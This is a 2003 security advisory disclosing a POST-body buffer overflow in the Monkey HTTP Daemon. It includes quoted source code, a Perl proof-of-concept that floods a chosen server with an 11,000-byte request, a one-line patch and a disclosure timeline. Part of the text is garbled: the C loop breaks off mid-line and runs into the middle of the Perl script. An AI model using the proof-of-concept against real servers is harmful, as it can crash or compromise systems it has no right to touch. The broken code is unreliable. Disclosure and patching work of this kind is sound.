Monkey HTTP Daemon Remote Buffer Overflow ABSTRACT "Monkey is a Web server written in C that works under Linux. This is an open source project based on the HTTP/1.1 protocol. The objective is to develop a fast, efficient, small and easy to configure web server." (quote from http://monkeyd.sourceforge.net) DESCRIPTION A buffer overflow vulnerability exists in Monkey's handling of forms submitted with the POST request method. The unchecked buffer lies in the PostMethod() procedure. The buffer allocated on line 3 of PostMethod(): char buffer[MAX_REQUEST_BODY]; Is of size MAX_REQUEST_BODY, which is defined as follows in monkey.h: #define MAX_REQUEST_BODY 10240 /* Maximo buffer del request */ The security check on line 10 of the procedure: if(content_length_post<=0){ is flawed. This results in a buffer overflow inside the loop below: memset(buffer,'\0',sizeof(buffer)); for(i=4;i)); print STDOUT "What port to connect to \[80\]\: "; $port = trim(chomp($line = )); $addr = "$host\:$port"; print STDOUT "What script to submit to \[\/cgi-bin\/test\.pl\]\: "; $script = trim(chomp($line = )); $buffer = "A"x11000; $exploit = "POST /$script HTTP/1.0\r\n"; $exploit.= "Content-Type: application/x-www-form-urlencoded\r\n"; $exploit.= "Content-Length: 11000\r\n\r\n"; $exploit.= "$buffer\r\n\r\n"; $f = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$addr); print $f $exploit; sleep 5; undef $f; WORKAROUND In monkey.c, replace the line: if(content_length_post<=0){ with: if(content_length_post<=0 || content_length_post >= MAX_REQUEST_BODY){ Stop the server, re-build your binary, and restart the server. VENDOR RESPONSE The vendor was contacted on March 15, a fix was made public 9 days later on March 24. The fixed version, Monkey 0.6.2 is available at: Package TAR/GZ http://monkeyd.sourceforge.net/get_monkey.php?ver=4 Debian packages (un-officially maintained by Mattias Fernandez) have not been updated as of time of writing. DISCLOSURE TIMELINE March 15, 2003: Initial developer notification March 18, 2003: Response from Eduardo Silva (edsiper@yahoo.es) indicates that vulnerability will be fixed by March 24 March 23, 2003: Final contacts with developer March 24, 2003: Monkey HTTPd 0.6.2 released April 20, 2003: Public disclosure